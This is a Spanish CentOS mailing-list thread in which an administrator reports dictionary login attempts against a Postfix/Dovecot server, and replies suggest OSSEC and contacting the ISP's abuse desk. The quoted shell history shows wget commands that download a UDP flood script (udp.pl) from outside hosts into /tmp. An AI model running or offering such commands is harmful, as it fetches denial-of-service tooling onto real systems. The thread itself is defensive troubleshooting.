[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Jesus Armando Uch Canul jahrmando en gmail.com
Sab Mar 23 02:38:04 UTC 2013


Configurate un servicio OSSEC es un detector de intrusos basado en host y
rootkit
El 22/03/2013 02:32, "Francesc Guitart" <francesc.guitart en enise.fr>
escribió:

> Hola,
>
> Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit :
> > Buenos días a todos de la lista:
> > Primero que nada les cuento la experiencia que estoy  pasando  con mi
> servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he
> notado  que el  servidor a las 5:00PM  es atacado/escaneado  o  algo  asi
>  tratando de conectarse al  dovecot especificamente ,les posteo  lo que
> sale...--------------------- pam_unix Begin
> > ------------------------
> >
> >    dovecot:
> >
> >      Authentication
> > Failures:
> >
> >         contacto
> > rhost=66.142.38.137 : 88 Time(s)
> >
> >
>
> [...]
>
> >         turismo
> > rhost=66.142.38.137 : 57 Time(s)        ..........
> .................        ............(hay mas resgisto q no lo pongo  es
> bastante todos salen de la misma ip)        Unknown Entries:
> >
> >         check pass;
> > user unknown: 3901 Time(s)
> > Al parecer es un diccionario que prueba esos usuarios para ingresar al
> dovecot o  bien al postfix.esto ya me pasa desde ya hace un mes y no puedo
> detectar como y  donde se ejecuta, pero  si  averigue que hicieron y  que
> se bajaron para realizar esto.
> > el cual detallo, yo  uso  un Centos 6.0 64 bits, fue un usuario interno
> con conocimiento basicos de linux ( al menos eso creo ) se conecto  y  hizo
> eso, (lo saque del  history)wget http://y2khom3.evonet.ro/udp.plwget
> www.buble.biz/alinftp/udp.plwget
> www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls
> -awpasswd mcondeexit
> > El detalle es que desde ese momento ya tengo  el problema que les
> comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo
> mismo? espero me puedan alguna señal  de como detectar de donde se ejecuta
> dicho escaneo .si esta en mi server y  siempre se ejecuta a esa hora?? o
>  es un scaneo  externo.
> > Saludos
> > Luis Roman
> >
>
> Como te ha respondido José Fernández los logs muestran intentos de
> conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL
> de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell,
> que a su vez parece ser propiedad de AT&T:
>
> adsl-66-142-38-137.dsl.kscymo.swbell.net
>
> Si siempre es esta IP la que trata de acceder a tu servidor contacta con
> ellos, tienen una cuenta de correo para estos casos. Escríbeles a
> abuse en swbell.net y explícales el problema. Deberían poner remedio.
>
> http://public.swbell.net/contact.html
>
> Saludos.
>
>
> --
> Francesc Guitart
>
>
>
>
>
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org
> http://lists.centos.org/mailman/listinfo/centos-es
>


Más información sobre la lista de distribución CentOS-es